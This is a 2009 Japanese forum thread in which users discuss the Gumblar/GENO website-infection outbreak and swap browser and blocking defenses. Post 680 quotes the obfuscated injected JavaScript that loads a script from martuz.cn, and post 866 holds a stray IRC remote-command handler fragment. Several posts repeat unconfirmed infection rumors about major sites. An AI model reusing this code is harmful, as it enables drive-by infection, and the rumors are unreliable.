655名無しさん@お腹いっぱい。:2009/05/16(土) 12:23:50
>>635
それにGENOだけじゃなく普通の新種ウイルスにも注意するべきだろw
656名無しさん@お腹いっぱい。:2009/05/16(土) 12:24:07
>>637
どういうこと?詳しく
657名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:00
631です

sqlサーバー入ってる
…けどファイルの最終更新日が、同人の方で感染報告してる人たちと同じみたいなのでやっぱ怪しいわ
658名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:02
>>647
日本語で頼む
659名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:22
>>654
VistaのUACも同じだろな
うっかり「OK」をクリックしそうだ
660名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:32
>>644
objectタグ使うとかありうるよな。
ftpアカウント取っちゃってるんだから、新たなおいしい脆弱性が発見されるまで
発症しないで潜んでるなんていうのもありうる。
661名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:49
>>647
ありがと!
662名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:54
>>527
作ってお願い。
663名無しさん@お腹いっぱい。:2009/05/16(土) 12:25:57
>>647
>>652
なるほど
気を付ける
664名無しさん@お腹いっぱい。:2009/05/16(土) 12:26:24
一番はやっぱりプラグインの無効化だろう
Adobe Flash Player を最新版にしたらおかしくなるんだけど…いろいろ見れなくなる
これってこのウイルスのせいなの?
もう一か月以上続いてるんですけど・・・;
666名無しさん@お腹いっぱい。:2009/05/16(土) 12:27:36
>>647
してやったぞ
ありがたく思え
667名無しさん@お腹いっぱい。:2009/05/16(土) 12:28:19
>>649,653
なんか俺が馬鹿みたいじゃん^^;
668名無しさん@お腹いっぱい。:2009/05/16(土) 12:28:23
>>665
それは普通に更新したらおかしくなる不具合でてる
完全に削除してから入れると良い
669名無しさん@お腹いっぱい。:2009/05/16(土) 12:28:25
緊張感でチンポしゃぶりたくなってきた
670名無しさん@お腹いっぱい。:2009/05/16(土) 12:29:37
>>647
変更したありがとう
671名無しさん@お腹いっぱい。:2009/05/16(土) 12:29:44
何かもうやること多くてやんなっちゃうな
感染してもおkなPC用意して見た方が楽かもしれん
672名無しさん@お腹いっぱい。:2009/05/16(土) 12:30:06
FIREFOXで安心が買えるのか?
心配になってきた…
673名無しさん@お腹いっぱい。:2009/05/16(土) 12:30:15
>>671
そこでLinuxですよ旦那!!
674名無しさん@お腹いっぱい。:2009/05/16(土) 12:30:31
>>656
noscriptはjsを個別にjsのドメインで許可不許可できる
今までみたいなjs全許可不許可とは全くの別物
675名無しさん@お腹いっぱい。:2009/05/16(土) 12:31:02
感染してるかもしれないサイトを、更新チェッカー(WWWC)でチェックしても大丈夫ってことだよね。

今のところ不気味なことは起きてないし。
676名無しさん@お腹いっぱい。:2009/05/16(土) 12:31:14
>>647のやり方誰か教えてくれ
677名無しさん@お腹いっぱい。:2009/05/16(土) 12:31:24
95.129.144.0/23 全焼きしておこう
678名無しさん@お腹いっぱい。:2009/05/16(土) 12:32:20
>>647
ありがとう、勉強になった
679名無しさん@お腹いっぱい。:2009/05/16(土) 12:32:43
>>671
上級者も根を上げそうですか
680コピペ:2009/05/16(土) 12:33:00
ttp://www3.atword.jp/gnome/

*** 緊急 ***

gumblar.cn 95.129.145.58 の代わり

martuz.cn
95.129.145.58

IP addr は変更されていませんが gumblar.cn のドメインベースのみでブロックしている方は注意してください。

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

>>560
このサイトは既に martuz.cn になっている。

(function(){var UkRR='%';var WdBp=('var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j " a "Major" b+a+"Minor" b a "Build" b "j;");
document.write("<script src=//martu" "z.cn/vid/?id="+j "><\/script>");}').replace(//g,UkRR);eval(unescape(WdBp))})();
681名無しさん@お腹いっぱい。:2009/05/16(土) 12:33:03
ジェノサイドウイルスか
682名無しさん@お腹いっぱい。:2009/05/16(土) 12:33:20
通販サイトでサイズ表を見ようとしたらエラーになるんだがやられたのかな

>モール/ストアでは現在問題が発生しています。
>あとでもう一度試してください。
>コマンド構造の失敗
>(CMN0950E)
>コマンドを完了できません。コマンド構文が正しくないか、システムが必要とするパラメーターが渡されていません。

わりと大手のところなんだがこんなんじゃ迂闊にネットできないな
683名無しさん@お腹いっぱい。:2009/05/16(土) 12:33:24
>>665
http://www.adobe.com/jp/shockwave/download/alternates/
ここからアンインストーラを落として、アンインスコ→再インスコし直してごらん
684名無しさん@お腹いっぱい。:2009/05/16(土) 12:33:53
>>676
「about:config」でググれ。

でも、ググる前に、about:configでnetwork.prefetch-nextを無効にしておけよ。
685名無しさん@お腹いっぱい。:2009/05/16(土) 12:33:58
>>676
火狐のロケーションバーにabout:config 入れろ
686名無しさん@お腹いっぱい。:2009/05/16(土) 12:34:15
>>676
Firefoxのアドレス欄にabout:configってコピペ、Enter、
ずらずらーーーーーってアルファべ順に出てくる項目の中から
network.prefetch-nextを探して洗濯、右クリでtrueをfalseに変更
687名無しさん@お腹いっぱい。:2009/05/16(土) 12:34:23
>>684
クソワロタwwww
688名無しさん@お腹いっぱい。:2009/05/16(土) 12:34:45
>>682
名前出そうよ
隠してる場合じゃないだろ
689名無しさん@お腹いっぱい。:2009/05/16(土) 12:35:08
FirefoxのURLバーに「about:config」と入力する。※警告が出てきても大丈夫
上の検索で「network.prefetch-next」と入力して、出てきた値がtrueだったらダブルクリック→falseにする。
あとFasterfoxだっけか?あれの先読みも切った方がいいかな
690名無しさん@お腹いっぱい。:2009/05/16(土) 12:35:16
>>682
ニッセンとかムトウとか?
691名無しさん@お腹いっぱい。:2009/05/16(土) 12:35:38
>>686
network.prefetch-nextを探してとかクソだるいから、ずらずら出てるとこの上の
フィルタってとこにまんま「network.prefetch-next」入れろ。したらFirefoxが探して
くれるから。
692名無しさん@お腹いっぱい。:2009/05/16(土) 12:36:10
>>685
トンクス
693名無しさん@お腹いっぱい。:2009/05/16(土) 12:36:19
Genoウイルスが更に凶悪化したら
上級者のお前らでも対応できるのか!

まあ無理と思うがなー
694名無しさん@お腹いっぱい。:2009/05/16(土) 12:36:34
>>676じゃないが怖くてググれなかったから助かったwwwありがとうww
695名無しさん@お腹いっぱい。:2009/05/16(土) 12:36:37
>>682
そうだね、あまりにも大手なら一部伏字でも名前だした方がいいかも
696名無しさん@お腹いっぱい。:2009/05/16(土) 12:37:22
アマゾンか
697名無しさん@お腹いっぱい。:2009/05/16(土) 12:37:44
おいおい。感染拡大してんの?
698名無しさん@お腹いっぱい。:2009/05/16(土) 12:37:49
>>647
ありがとう

しかしこれをしたらリンクに飛ぶのが面倒になるんだな…
感染するよりはましだが
699名無しさん@お腹いっぱい。:2009/05/16(土) 12:38:04
>>628
この犯人はただのお騒がせ目的じゃなくて
集めたパスワードとかの情報で悪い金儲けを企んでいるわけでしょ?
そのラインから捕まえられないのかなあ?
700名無しさん@お腹いっぱい。:2009/05/16(土) 12:38:16
konozama陥落か
701名無しさん@お腹いっぱい。:2009/05/16(土) 12:38:34
>>697
この伸び方、おもろいだろ?
702名無しさん@お腹いっぱい。:2009/05/16(土) 12:38:34
加速度的に汚染が進みそうな予感
てか進んでるのか
703名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:01
>>676
Firefoxの先読みをOFFにするとインターネットが遅くなるがガマンしろな!
704名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:07
>>693
俺、友達にスパーハカーがいるから何とかしてもらう
705名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:16
>>698
体感速度そんな変わらなかったけどなあ。
706名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:28
Vistaユーザー用に C:\Windows\Help\mui以下のディレクトリにsqlsodbc.chmが存在する
ってあったんだが更新日が2006年でサイズが50KB 前後なんだよね
これってセーフでいいのかな
707名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:29
しかし、なんで同人系は感染率高いんだ?
動画サイト経由で食らったんかな?
708名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:29
falseに変えたらそのままタブ閉じちゃえばいいの?
設定ページからの戻り方が分からない
709名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:52
アマゾン陥落?
嘘だよな?
710名無しさん@お腹いっぱい。:2009/05/16(土) 12:39:58
>>708
閉じていい。
711名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:04
今朝、他の掲示板はどうかと思ってアホーの掲示板でウィルスで探してみた
見なければ良かった・・・orz

セキュリティーソフトも入れていないのが多数
それで言い訳は初心者wwwwwwww
拡散するだろうなと思って恐ろしくなったよ
712名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:07
>>647設定したけど遅くなったりはしなかったんだぜ
713名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:31
>>704
友達のスパハカーのパソコンもGENOウイルスに感染している悪寒w
714名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:39
ええええ、アマゾン??利用しまくってるのに…
もう、怖くてネットサーフィンできないな
715名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:41
タスクマネージャー見たらASDUtility.exeが起動してた
なんだこれ
716名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:41
>>710
閉じた。ありがとう。
717名無しさん@お腹いっぱい。:2009/05/16(土) 12:40:50
>>701
流れ早いしwやっかいそうだな
718名無しさん@お腹いっぱい。:2009/05/16(土) 12:41:24
>>707
サイト持ちが感染→気がつかずにサイト更新→サイト見た人が感染
のループ
719名無しさん@お腹いっぱい。:2009/05/16(土) 12:41:25
>>707
多分、見てる奴が作る奴兼ねてる率が滅茶苦茶高いから。
720名無しさん@お腹いっぱい。:2009/05/16(土) 12:41:40
アマゾン感染ならまじでニュースになるな
721名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:04
>>706
問題ない。その日付だとMSSQL2005相当のヘルプファイルでたぶんVistaのデフォ。
722名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:05
>>712
そうか光あたりを入れてた別だな
723名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:12
豚フルの奴どこで感染したんだよ
724名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:21
PC(XP Pro Sp3)内を検索してもsqlsodbc.chm見つからないんだけれど
ないとやばいの?
725名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:22
スレチなのでいい加減止めるが
このウィルス、感染者のサイトを改竄して
普通のサイトをどんどんウィルスサイトにする所が怖い
最近では小林製薬とかのサイトも感染したんだぜ
もう述べ何万件も感染してるだろう(復旧したところもあるけど)
あんまりにも一部でしか騒がれてないからついつい書いたもにぃ
726名無しさん@お腹いっぱい。:2009/05/16(土) 12:42:27
>>674
基本全て禁止→個別に許可じゃないの?
個別に94.247.2.195を禁止ってどうやって設定するの?
727名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:07
>>713
そしたらその日からそいつのことをスパーバカーと呼ぶことにする
728名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:07
アマゾンは釣りだろw
729725:2009/05/16(土) 12:43:11
人生初めての誤爆orz
730名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:15
>>703
逆に早くなるんじゃないの?
731名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:19
>>707
同人サイトを検索するサーチエンジンが感染してる
732名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:28
>>722
ADSLですが快適です
733名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:36
konozama!!!!!
734名無しさん@お腹いっぱい。:2009/05/16(土) 12:43:53
>>578
その上、経済状況までクソ悪いんだからシャレになんねーよ今の世の中wwwどうなってんだよwww
735名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:20
え、何、アマゾン陥没したんか?釣りだよな?
736名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:24
DNSプリフェッチはONでも関係ないよね? あるのかな?
737名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:33
ウイルス作るようなやつはもう終身刑でいいよ。

今回のような悪質なウイルスを作る奴は死刑。
738名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:33
混乱したら困るから釣りはやめとけ
739名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:52
>>721
ありがと
しかしVistaは大丈夫とか大丈夫でないとかどっちなんだかわけわからなくなってきてるな
740名無しさん@お腹いっぱい。:2009/05/16(土) 12:44:58
>>735
もう、どっちでもいいよorz
741名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:11
>>705
体感速度は変わらないんだけどリンクに飛ぶたび、プログラムを選択しなくちゃいけないのがちょっとね

これで、どれだけ被害を防げるのだろう…
742名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:20
釣りはよしとけ
743名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:41
>>736
関係ない。DNSポイズニングならたいていのアンチウィルスで検知できるし。
744名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:45
>>599
おい、avast反応したぞ・・・
745名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:48
>>711
初心者はセキュリティ祖父と入れなくていいと思い込んでいそうですね^^;
746名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:51
>>741
え?なんぞそれ
どういう状況?
747名無しさん@お腹いっぱい。:2009/05/16(土) 12:45:53
豚エンザ 報道中www がんがれますぞえ
748名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:11
>>441フンじまったから
avastで「完全な検査」したら引っ掛かりまくりだなw
俺のPC終わったなw
749名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:20
Amazonは釣り?
750名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:33
しまった今までウイルスバスターやら火狐やら積んでなかった
今この状況で何積んどけばいいんだ
751名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:38
いっそのことwindows全滅してくれれば・・・・
Mac,Linux,BSDの時代キター!?

まぁ、Vista以降だとアドレスランダム化があるから確実に進入は難しくなるけど。
752名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:44
海外渡航歴なしって神戸終わったな
753名無しさん@お腹いっぱい。:2009/05/16(土) 12:46:57
>>743
そうですか ありがとう御座います
754名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:00
神戸って外国?
755名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:12
危険なアドを貼るときはまじで配慮しろよ
無知な奴がかなり踏んでるから
756名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:29
>>754
ワラタ
757名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:34
これどんな対策しても亜種が次々出て来てるんだよな・・・
根本的に解決できるまで専ブラで2chだけとかが安心だな
758名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:50
まあkonozama陥落してなくても
今はネットショッピングとかやめといたほうがいいだろ
759名無しさん@お腹いっぱい。:2009/05/16(土) 12:47:52
>>726
そうだけど何が疑問なんだ?
760名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:07
>>744
Avast!って過剰反応だよな。
761名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:10
>>751
windows全滅してくれれば、
Mac,Linux,BSDにウイルス感染クルーだろ!
762名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:15
ネットでクレカ使うの怖いね今は
763名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:27
>>754
兵庫県は多国籍国家
764名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:37
新型インフルエンザが流行したら篭城してネットでも楽しむかと思えば、
そのネットに接続するのも恐ろしい事態になるとは…。
765名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:39
donutならボタンひとつでjava切れるから最強だな!!
766名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:41
国内で豚インフル…?どうせ引きこもりだし関係ないしwww
ネサフしてれば時間なんて…

…え?
767名無しさん@お腹いっぱい。:2009/05/16(土) 12:48:59
>>746
リンク先に飛ぼうとする→このリンクは他のプログラムで開く必要があります→プログラムの選択→狐かその他を選択

みたいな流れ
768名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:02
MacがやられてたらBSDも危ない
その逆もまた
769名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:02
Janeでリンクからブラウザに飛ばないようにする方法ってないの?
770名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:26
>>682
Amazonなのか釣りなのか答えてくれ
771名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:27
>>758
・・・俺、つい5日くらい前にカードで買い物したばかりなんだ
772名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:45
>>760
過剰・・・なのか?まじで怖いんだが
773名無しさん@お腹いっぱい。:2009/05/16(土) 12:49:49
近々欲しい物があって通販しようと思ってたけど
こりゃ普通のネット巡りも当分保留だな…
774名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:00
ぜんぜん報道されてないみたいなんだけど なぜ?
どれくらいの実害がでるか想像できない状態なんだろ?
775名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:13
どこの通販サイトなのか言ってくれ
776名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:17
>>770
ダメな時は何してもダメなもんだ。あきらめれ
777名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:34
>>769
設定でブラウザのパスを指定しない
ttpをNGに登録
そもそもネサフしない
778名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:40
ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=42&y=10
まぁどうせ練鯖なんだろうけど
779名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:43
もうJS全部不許可にしとかないと何処も信用できないな
780名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:45
>>774
放送の優先順位が豚ちゃん
781名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:49
楽天だったら俺死亡
782名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:54
992 名前:geno[sage] 投稿日:2009/05/16(土) 12:49:26 ID:GQnaax2E0
小学館とスクエニの公式の一部が感染してたぞ
ヤング系
783名無しさん@お腹いっぱい。:2009/05/16(土) 12:50:59
おいおい勘弁してくれ…
784名無しさん@お腹いっぱい。:2009/05/16(土) 12:51:15
>>774
蔓延してから報道するんだろうな
テレビっていつもネットより随分遅れてるし
>>668>>683
そうなのか!?ありがとう、やってみる。
786名無しさん@お腹いっぱい。:2009/05/16(土) 12:51:55
>>779
今頃、気づいたか
787名無しさん@お腹いっぱい。:2009/05/16(土) 12:51:56
>>781
あれ?俺いつ書き込んだんだ?
788名無しさん@お腹いっぱい。:2009/05/16(土) 12:52:52
楽天市場は中古PC家が感染報告されてたよな
789名無しさん@お腹いっぱい。:2009/05/16(土) 12:53:09
このウイルスも厚生労働省に電話すればおk?
790名無しさん@お腹いっぱい。:2009/05/16(土) 12:53:11
>>784
この板来てここ見てるような人以外は
かなりのほほんしてるように感じるよ、ちゃねらでさえ今回は…
791名無しさん@お腹いっぱい。:2009/05/16(土) 12:53:30
これからは超漢字の時代が                       来ないな・・・
792名無しさん@お腹いっぱい。:2009/05/16(土) 12:53:47
>>599
此処って踏んで大丈夫だった?PCがフリーズしたんだけど・・・。知恵袋だよね?
793名無しさん@お腹いっぱい。:2009/05/16(土) 12:53:54
VISTAでパソコン重くなってないから大丈夫なん?


vistaの確認方法って>>7でおk?
794名無しさん@お腹いっぱい。:2009/05/16(土) 12:54:09
まさかこんな形で2chどころかネットが終わりを迎えるとは
795名無しさん@お腹いっぱい。:2009/05/16(土) 12:54:36
>>772
>>599の内容は、↓だから無害だよ。開いてもJavaScriptは実行されない。

ヨミサーチを設置後、htmlソースがおかしくなりました。

スクリプト記述部が

<script language=javascript><!--
(Genoウィルスの内容がテキストで張られている)--></script>

となってしまいました。
最初は普通にプログラムとして記述されていたのに
いつのまにかこんなことになっておりました。
なぜこうなってしまったのでしょうか。ウイルスでしょうか・・・
------------------------------------------------------------------------------------------------------------
ベストアンサーに選ばれた回答

doctorwho_torchwood_tardis_mayoさん

問題ありません。
特に気にしなくても結構です。
------------------------------------------------------------------------------------------------------------
そうなのですか・・・。ありがとうございました!
教えてください。お願いします。
796名無しさん@お腹いっぱい。:2009/05/16(土) 12:54:51
感染したら駆除方法はOSの再インスコしかないの?
797名無しさん@お腹いっぱい。:2009/05/16(土) 12:54:52
世の中ウイルスだらけ
798名無しさん@お腹いっぱい。:2009/05/16(土) 12:54:57
行きつけの古着屋のブログ行ったらadobeが暴走したwww
799名無しさん@お腹いっぱい。:2009/05/16(土) 12:55:12
>>767
なんでそんなことになるのかさっぱりわからんが、それ先読み切ったせいとは
まったく関係ないと思うぞ。
800名無しさん@お腹いっぱい。:2009/05/16(土) 12:55:22
ヤフーも感染かよ…
801名無しさん@お腹いっぱい。:2009/05/16(土) 12:55:47
ヤフーも?
やべーホームに設定してるのに
802名無しさん@お腹いっぱい。:2009/05/16(土) 12:56:30
感染してないサイトを探すほうが難しくなってきたな
803名無しさん@お腹いっぱい。:2009/05/16(土) 12:56:42
もう怖すぎるよぉ
しばらく引きこもる
804名無しさん@お腹いっぱい。:2009/05/16(土) 12:56:42
ヤホー?ナイツも感染したの?
805名無しさん@お腹いっぱい。:2009/05/16(土) 12:56:45
view-source:http://www.amazon.co.jp/

いまんところmartuないぞ
806名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:10
>>800
まじで?
807名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:16
>>782の小学館ってのはマジ?
808名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:33
知恵袋死亡www
809名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:38
あんまりホラ吹かれると洒落になんねえぞ
810名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:39
pcだと感染するからPS3やwiiでネサフした方が良さそうだな。
いつかPS3・wii用のウイルスも出るんだろうけど。
811名無しさん@お腹いっぱい。:2009/05/16(土) 12:57:52
>>599
この質問・回答は役に立ちましたか?
はい いいえ .お役立ち度:6人中 0人が役に立つと評価しています。

評価0人で救われた
812名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:10
>>800
ん?
>>599は開いても大丈夫だぞ。質問者は感染してるが。
813名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:15
誰か>>599確かめて来いよw
814名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:31
>>792
みんなしてこぞってアクセスし過ぎだよね
815名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:35
こんなスパイウェア消えればいいのに
816名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:54
一番安心なネサフ方法発見


ドリームキャストで(ry
817名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:58
だから釣りはやめろってば…
818名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:59
>>814
なるほど、そういうことか
819名無しさん@お腹いっぱい。:2009/05/16(土) 12:58:59
>>682
アドレス貼らずに名前を一部伏字で書いてちょ
820名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:04
>>810ドリームキャストしか持ってねぇ
821名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:10
MSNはまだ大丈夫だよな…?
822名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:26
adobe readerでバージョンアップが必要なのって9.1の奴だけだよな?
9.1の 脆弱性付かれてるから9.1.1にする必要があるんだよな
9.0とか8の奴ってのとりあえず更新しないでおいたほうがいいよな
823名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:34
釣りって下手すりゃなんたら業務妨害だっけ?
824名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:40
楽天でショッピングできねぇえええええええ
825名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:45
BeOS
826名無しさん@お腹いっぱい。:2009/05/16(土) 12:59:52
ドリキャスどこに閉まったっけか
827名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:12
どこが感染したとか釣ってる奴ら
勘弁してください
828名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:27
いつもながらAvast!は過剰反応だな。
Avast!入れてるPCだと確かに>>599に反応してしまう。
829名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:38
>>772
テキストに反応してるだけでしょ?
830名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:41
怖くてネット繋げねー
831名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:44
持ってて良かったドリームキャスト
832名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:46
感染が確認されたところまとめて欲しい
833名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:50
LANがドリキャスのモデムにささらねえorz
834名無しさん@お腹いっぱい。:2009/05/16(土) 13:00:54
>>821
MSNでWEBメールをやっていたら
嫌でもスクリプトを許可しないと駄目だから感染したらキツイな
835名無しさん@お腹いっぱい。:2009/05/16(土) 13:01:03
>>767
自分も早速設定やったけどそんな事には・・・
違うとこいじったんじゃないかな?
因みにネット回線あんまり速くないんでちょびっと描画遅くなった気がするよ
836名無しさん@お腹いっぱい。:2009/05/16(土) 13:01:05
view-source:楽天

いまんところmartu/gumburなし
837名無しさん@お腹いっぱい。:2009/05/16(土) 13:01:24
avastは敏感に反応しすぎ
838名無しさん@お腹いっぱい。:2009/05/16(土) 13:01:30
>>829
だったら問題ないんだよな・・・?
839名無しさん@お腹いっぱい。:2009/05/16(土) 13:01:56
>>599
酷いな。YahooIDでログインして、回答に違反報告クリックしといたが、なんでまずいのかのコメントを
付けれないから、担当者が理解できるかどうか…。

取り敢えず、あの嘘回答で蔓延を加速させた奴の発言は、違反報告クリックしとけ。
840名無しさん@お腹いっぱい。:2009/05/16(土) 13:02:01
何この

かつてないリンク先誤クリックの怖さw
841名無しさん@お腹いっぱい。:2009/05/16(土) 13:02:23
楽天の場合は各ショップでhtml弄くるだろ?
そういうことだ
842名無しさん@お腹いっぱい。:2009/05/16(土) 13:02:41
よし、Adobe Readerを9.1.0→9.1.1にしたぞ
これで一安心だな
843名無しさん@お腹いっぱい。:2009/05/16(土) 13:02:41
>>833
なんかワロタ
走って合うの買ってこいw
844名無しさん@お腹いっぱい。:2009/05/16(土) 13:02:53
>>841
じゃあ同人系のショップがやられてるわけか
845名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:02
ぶっちゃけ、ノートン大先生を最新に更新しておけば心配なし?
846名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:06
こんな恐ろしい状況、ネット歴10年の俺は初めてなんだが
847名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:10
>>838
問題ないよ。内容は>>795の通りで、質問者がテキストでGenoを張っていて
そのテキストにAvast!が反応しちゃってるだけ。
848名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:29
とんだ週末になりそうだ
849名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:48
>>845
ノートンはギャンブラーに反応してなかったんじゃ・・・
850名無しさん@お腹いっぱい。:2009/05/16(土) 13:03:51
>>845
ノートン大先生は全く名前が出てこないぐらいついてきていらっしゃいません
851名無しさん@お腹いっぱい。:2009/05/16(土) 13:04:12
>>845
いや、めちゃくちゃ心配。ほぼ全スルー。
852名無しさん@お腹いっぱい。:2009/05/16(土) 13:04:27
Web制作会社勤務だけど、
会社のPC(WinXP Pro SP2)が一台感染してた。オワタ
853名無しさん@お腹いっぱい。:2009/05/16(土) 13:04:29
>>847
ありがとう!死んだかと思ったよ・・・
854名無しさん@お腹いっぱい。:2009/05/16(土) 13:04:59
山田のときも祭りだったが、今回のはシャレにならん怖さがあるな
855名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:06
ノートン先生もウイルスの進化に置いてけぼりくらってます
856名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:06
ご老体ですから
857名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:17
で、打開策はあるのか?このままじゃ感染が拡がる一方だが
858名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:18
>>852
オワタwwwwww
859名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:20
しばらく2chだけにしよう
860名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:34
>>854
どこに地雷が埋まってるか解らないもんな
861名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:43
誰か小学館とスクエニ見てきて…
862名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:56
おまえら2ちゃんだけでいいじゃん
863名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:57
>>854 山田オルタナティブって久しぶりに聞いた。
864名無しさん@お腹いっぱい。:2009/05/16(土) 13:05:57
しばらくは2chとヤフオクだけにするか・・・。
865名無しさん@お腹いっぱい。:2009/05/16(土) 13:06:24
>>852
やめろよなーwwww
866名無しさん@お腹いっぱい。:2009/05/16(土) 13:06:37
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
867名無しさん@お腹いっぱい。:2009/05/16(土) 13:06:47

※※※ gumblar.cnはmartuz.cnに引っ越ししたようです。 ※※※

ブロック範囲変更しないと…
868名無しさん@お腹いっぱい。:2009/05/16(土) 13:06:59
>>854
山田ウイルスは予防対策も出来たが、この手の奴はうっかり感染しそうだよ
869名無しさん@お腹いっぱい。:2009/05/16(土) 13:07:15
>>852生きろおおお
870名無しさん@お腹いっぱい。:2009/05/16(土) 13:07:22
>>867
何とかしてくれ
871名無しさん@お腹いっぱい。:2009/05/16(土) 13:08:05
>>867
え!また移動したのかよ!!!
勘弁してくれ!
872名無しさん@お腹いっぱい。:2009/05/16(土) 13:08:11
>>799
ごめw
違うところ変えてたorz
873名無しさん@お腹いっぱい。:2009/05/16(土) 13:08:13
山田みたいにみんなで楽しめるようにしてくれればいいのにね
874名無しさん@お腹いっぱい。:2009/05/16(土) 13:10:55
GENO社員必死だなw
875名無しさん@お腹いっぱい。:2009/05/16(土) 13:11:03
あれ?
てすと
